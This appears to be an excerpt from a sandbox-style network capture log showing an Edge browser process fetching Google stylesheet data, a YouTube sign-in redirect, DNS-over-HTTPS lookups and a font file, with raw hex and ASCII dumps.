2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2c 23 31 66 31 66 31 66 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 47 6f 6f 67 6c 65 20 53 61 6e 73 22 2c 72 6f 62 6f 74 6f 2c 22 4e 6f 74 6f 20 53 61 6e 73 20 4d 79 61 6e 6d 61 72 20 55 49 22 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 6c 50 78 41 65 62 20 2e 56 68 64 7a 53 64 7b 63 6f 6c 6f 72 3a 23 34 34 34 37 34 36 3b 63 6f 6c 6f 72 3a 76 Data Ascii: 3-sys-color-on-surface,#1f1f1f);font-family:"Google Sans",roboto,"Noto Sans Myanmar UI",arial,sans-serif;font-size:0.875rem;font-weight:500;letter-spacing:0rem;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.lPxAeb .VhdzSd{color:#444746;color:v
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 6f 77 3a 30 20 30 20 30 20 32 70 78 20 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 2c 23 64 33 65 33 66 64 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 36 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 69 6e 73 65 74 3a 2d 35 70 78 7d 2e 5a 6a 79 74 69 7b 63 6f 6c 6f 72 3a 23 30 62 35 37 64 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 30 62 35 37 64 30 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 35 72 65 6d 7d 2e 6d 38 77 77 47 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: ow:0 0 0 2px var(--gm3-sys-color-primary-container,#d3e3fd);border-radius:26px;content:"";position:absolute;pointer-events:none;inset:-5px}.Zjyti{color:#0b57d0;color:var(--gm3-sys-color-primary,#0b57d0);font-size:0.75rem}.m8wwGd{border-radius:16px;padding
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 49 78 63 55 74 65 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 6d 38 77 77 47 64 20 2e 49 78 63 55 74 65 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6d 38 77 77 47 64 2e 78 4e 4c 4b 63 62 20 2e 49 78 63 55 74 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 47 6f 6f 67 6c 65 20 53 61 6e 73 22 2c 72 6f 62 6f 74 6f 2c 22 4e 6f 74 6f 20 53 61 6e 73 20 4d 79 61 6e 6d 61 72 20 55 49 22 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 Data Ascii: px;width:24px}.IxcUte{direction:ltr;text-align:left;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.m8wwGd .IxcUte{line-height:30px}.m8wwGd.xNLKcb .IxcUte{font-family:"Google Sans",roboto,"Noto Sans Myanmar UI",arial,sans-serif;font-size:0.875r
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 3a 32 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 66 2d 74 66 73 2d 62 70 33 2c 32 2e 32 35 72 65 6d 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 36 30 70 78 29 7b 2e 76 41 56 39 62 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 32 32 32 32 32 32 32 32 32 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 66 2d 74 66 73 2d 62 70 33 2c 32 2e 32 35 72 65 6d 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 30 70 78 29 7b 2e 76 41 56 39 62 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 38 31 38 31 38 31 38 31 38 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 66 2d Data Ascii: :2.25rem;font-size:var(--wf-tfs-bp3,2.25rem)}}@media (min-width:960px){.vAV9bf{line-height:1.2222222222;font-size:2.25rem;font-size:var(--wf-tfs-bp3,2.25rem)}}@media (min-width:1600px){.vAV9bf{line-height:1.1818181818;font-size:2.75rem;font-size:var(--wf-
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 6f 70 61 63 69 74 79 2c 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 6f 70 61 63 69 74 79 2d 6f 75 74 7b 30 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 6f 70 61 63 69 74 79 2c 30 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 49 41 71 65 7b 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 73 69 7a 65 3a 30 3b 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 6c 65 66 74 3a 30 3b 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 74 6f 70 3a 30 3b 2d 2d 6d 64 63 2d Data Ascii: pacity:var(--mdc-ripple-fg-opacity,0)}}@keyframes mdc-ripple-fg-opacity-out{0%{animation-timing-function:linear;opacity:var(--mdc-ripple-fg-opacity,0)}to{opacity:0}}.VfPpkd-ksKsZd-XxIAqe{--mdc-ripple-fg-size:0;--mdc-ripple-left:0;--mdc-ripple-top:0;--mdc-
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 2d 6f 70 61 63 69 74 79 2d 6f 75 74 20 31 35 30 6d 73 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 74 72 61 6e 73 6c 61 74 65 2d 65 6e 64 2c 30 29 29 20 73 63 61 6c 65 28 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 73 63 61 6c 65 2c 31 29 29 7d 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 49 41 71 65 3a 3a 62 65 66 6f 72 65 2c 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 49 41 71 65 3a 3a 61 66 74 65 72 7b 74 6f 70 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 30 30 25 29 3b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 30 30 25 29 3b 77 69 64 74 68 3a 32 30 30 25 3b 68 65 69 67 68 74 3a 32 30 30 25 7d 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 Data Ascii: -opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end,0)) scale(var(--mdc-ripple-fg-scale,1))}.VfPpkd-ksKsZd-XxIAqe::before,.VfPpkd-ksKsZd-XxIAqe::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.VfPpkd-ksKsZd-Xx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	61218	64.233.167.84	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:17 UTC	912	OUT	GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:17 UTC	2081	IN	HTTP/1.1 302 Found Content-Type: application/binary Set-Cookie: __Host-GAPS=1:MLDJiLRGp5gakTGgL4_itshD5BO9yA:Sths-ah3nDbNumqO; Expires=Sun, 26-Jul-2026 15:57:17 GMT; Path=/; Secure; HttpOnly; Priority=HIGH Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:17 GMT Location: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AdF4I75xjgYOQnZOc1dgyDJW0XuZuxhgQ56BA1-GvfpWURqLzi0FCgO1lezcts3-GEpA8wRgNOlG Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-6aI-6w4TqYQz--vTVYymOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsSigninPassiveLoginHttp/cspreport/allowlist Cross-Origin-Opener-Policy: unsafe-none Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	61231	172.64.41.3	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 15:57:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 15:57:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 15:57:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a9595b94a297c6f-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:57:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2a 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom*)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	61229	172.64.41.3	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 15:57:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 15:57:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 15:57:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a9595b9386143aa-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:57:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 09 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	61230	172.64.41.3	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 15:57:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 15:57:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 15:57:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a9595b94fc50c76-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:57:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fa 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	61249	142.251.40.227	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:24 UTC	924	OUT	GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1 Host: fonts.gstatic.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" Origin: https://accounts.google.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:24 UTC	836	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes" Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]} Timing-Allow-Origin: * Content-Length: 52280 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 24 Jul 2024 07:55:37 GMT Expires: Thu, 24 Jul 2025 07:55:37 GMT Cache-Control: public, max-age=31536000 Age: 201707 Last-Modified: Tue, 23 May 2023 16:36:38 GMT Content-Type: font/woff2 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:57:24 UTC	554	IN	Data Raw: 77 4f 46 32 00 01 00 00 00 00 cc 38 00 15 00 00 00 02 16 18 00 00 cb be 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 89 5e 1b 81 fe 24 1c a4 34 3f 48 56 41 52 8e 17 3f 4d 56 41 52 39 06 60 3f 53 54 41 54 81 2a 27 2c 00 85 4a 2f 81 00 11 08 0a 81 e6 60 81 b6 28 0b 87 5a 00 30 83 b7 52 01 36 02 24 03 8f 2e 04 20 05 86 12 07 a8 4b 0c 07 5b 93 f8 71 86 96 63 07 92 54 ee cb ae e1 dd c5 98 3e cb 50 de 6a d8 a6 60 b3 77 bd d9 99 23 fb d3 d5 8d 25 cc b3 be 83 db 81 f6 e2 4e bc 22 fb ff ff ff 17 24 15 19 33 cd 30 ed 36 18 0c 04 af ea d5 ff 87 98 20 b8 4c 04 72 58 2f 72 5b 6a ce 79 9c 7c 2a 28 08 34 cc 81 25 23 f7 8c 92 b1 96 32 ae 76 b3 6d c6 14 2d 90 1d 25 bb 89 cd 9c 15 e8 3b 2d 1d 59 d6 7b 1b e1 26 f6 b9 4f 3d 23 6c 40 09 c7 e5 6b Data Ascii: wOF28^$4?HVAR?MVAR9`?STAT',J/`(Z0R6$. K[qcT>Pj`w#%N"$306 LrX/r[jy\|(4%#2vm-%;-Y{&O=#l@k
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 9e 74 f3 9f 10 dc 18 11 48 20 64 8d cb 65 5f d6 be 4b 2e f3 b2 2f 09 2b 38 00 51 11 50 c4 85 5a 51 0b ae b6 d6 b9 3b 9d 1d ce 55 fd ca af 9d ae 5d bb a7 f8 f7 ba ea bf 0e 5f 14 65 2a b3 b2 a0 f9 03 b2 37 31 e1 8f 3f 8e 37 11 4f 52 76 bf 3f cb d6 ae eb 6c ac b5 d6 47 7c d8 50 94 92 ee 7c 3a fd 9a 19 49 16 58 06 c9 32 b0 2c 93 4c 89 ed 00 c3 ee e6 ff 05 64 e7 67 ef 5d 7d 57 23 75 57 5d 51 6e 75 50 2d 73 e0 3b b1 2d 59 9a e1 9f ef ef e5 5d fb dc df 12 b0 d2 00 43 16 90 6a 5f f8 4d 30 84 11 8a 79 1f cf 1c 0b a7 e5 ec 4a f2 f9 d2 0b ea f4 01 09 c6 b1 e4 94 4e 59 00 0e 40 41 ff fd 9a 2c ed ce d4 9c de 2d 8c 46 95 c0 b5 03 e2 c0 27 fd d0 77 9f 2f 6a 35 67 a6 76 55 53 eb 16 d8 55 dd d6 a1 30 84 26 82 9d 19 79 37 b1 4c 50 f9 1d 91 aa ee 25 7f 89 8e 8c d2 59 0e a1 Data Ascii: tH de_K./+8QPZQ;U]_e*71?7ORv?lG\|P\|:IX2,Ldg]}W#uW]QnuP-s;-Y]Cj_M0yJNY@A,-F'w/j5gvUSU0&y7LP%Y
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 65 70 0b 00 48 00 80 17 af 3d 8f bc f6 ef 15 6d 69 2f 46 5b e3 dc b8 c0 42 a2 10 af f1 05 07 17 e3 19 43 ce f4 ed dc b8 eb cd f5 a3 d1 e6 bd a3 19 7b e7 d5 df be ff e3 2f ff eb 5b ff 00 8a 19 c1 ff ad 5f ad 8b a0 8b 98 24 cb ee b0 b9 0b ef 63 fd a7 fd 8f bf 02 7f 31 00 94 00 00 05 7d f1 d2 d5 4f 37 ac 5f ae 39 bf 6a 98 bf 6e b8 bf 5e 33 fe bc 61 fc 65 43 ff eb 1b ec ff dd ad 37 8f ac bf bf 14 be 75 e4 be fb f2 f0 bd a3 f1 eb ca bd 6e dc eb 87 e1 f5 4f fc a7 8c 7f f3 d0 bd 79 3c 79 73 a5 bf b9 32 de fc ad 7a e6 e1 eb 1f 94 cf ed 67 cf 43 93 9b 6f 1b b7 57 87 c5 8f d8 8b c1 e6 a5 bf 7f f7 1d f7 fe d7 f3 d7 6c 69 6b 39 6d e4 74 af b4 67 d6 e9 ea 10 36 3c 3f 35 e6 2b 73 fe f5 68 fe 43 7d 33 c6 6e d6 1a db f1 78 a7 68 cb 33 b2 53 ce 76 b1 fe f2 86 b1 bc e1 2e Data Ascii: epH=mi/F[BC{/[_$c1}O7_9jn^3aeC7unOy<ys2zgCoWlik9mtg6<?5+shC}3nxh3Sv.
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 44 50 4e a5 a6 31 f2 fc 72 f4 49 cd 52 b4 4c fb 49 47 76 ce 13 5e ae 7d 2a 5e 38 93 21 c1 46 bc b0 49 aa 45 f6 f7 7b 10 fc 2a 87 6b b3 27 cb 51 28 7a f9 41 7f 8a 56 24 3a 34 2b 5b 14 f8 75 a5 b3 db 6d 5e 8e 34 6d 33 ca c3 61 8c 05 b5 50 36 de 7c 59 e5 fa fb 51 53 c3 ce 79 ab 5e 02 19 f5 55 c0 0d bc 4f e4 c6 93 40 2b 9d 97 a7 6a 33 45 3a d4 24 c0 cc 0c c0 5d f7 a3 fb f1 c5 fc b1 58 87 bf cc 43 e5 9a 0b 3a d0 28 1f 86 c8 ed 5c 0b e7 d8 cb 34 c3 91 1e 7e 48 ea fd 80 5a b3 96 52 aa 92 c6 84 0a f0 21 af 01 6b c1 d1 f0 1c 2d 3f 38 2d 4b b8 f9 ef 72 f4 0c 9d 53 4d b2 e6 6c d3 97 00 ab 75 9b fb a3 c6 a4 b5 de 60 68 b6 ff c8 a7 1f 7f 9c 91 cf 6f 74 18 ee fd 77 b8 28 b1 55 94 6a 67 a6 00 7c c3 57 a4 10 e0 e6 4d bf 20 25 3e f6 f3 5e db 9c 48 e6 06 69 3a 5b 6e da dc Data Ascii: DPN1rIRLIGv^}^8!FIE{k'Q(zAV$:4+[um^4m3aP6\|YQSy^UO@+j3E:$]XC:(\4~HZR!k-?8-KrSMlu`hotw(Ujg\|WM %>^Hi:[n
